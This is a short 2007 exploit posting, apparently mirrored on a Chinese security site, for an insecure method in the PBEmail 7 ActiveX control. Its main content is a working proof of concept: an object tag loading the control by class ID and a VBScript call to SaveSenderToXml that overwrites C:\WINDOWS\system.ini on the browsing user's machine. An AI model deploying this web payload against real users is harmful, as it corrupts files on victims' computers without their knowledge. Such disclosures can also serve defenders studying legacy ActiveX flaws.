PBEmail 7 ActiveX Edition Insecure Method Exploit
|
来源:karatatata{at}hush{dot}com 作者:Katatafish 发布时间:2007-10-15
|
|
<pre> <b>Found by</b>: Katatafish (karatatata{at}hush{dot}com) <b>software</b>:PBEmail 7 ActiveX Edition <b>Vendor:</b> http://www.perfectionbytes.com <b>vulnerability</b>: Insecure method SaveSenderToXml(XmlFilePath: BSTR); stdcall; in PBEmail7Ax.dll <b>Tested on Internet explorer 7 with Windows XP SP 2.</b> <b>Thanks:</b> str0ke
</pre>
<object classid="clsid:30C0FDCB-53BE-4DB3-869D-32BF2DAD0DEC" id="kat"></object> <script language="vbscript"> kat.SaveSenderToXml "C:\WINDOWS\system.ini" MyMsg = MsgBox ("Done! Your C:\WINDOWS\system.ini file should now be overwriten.") </script>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|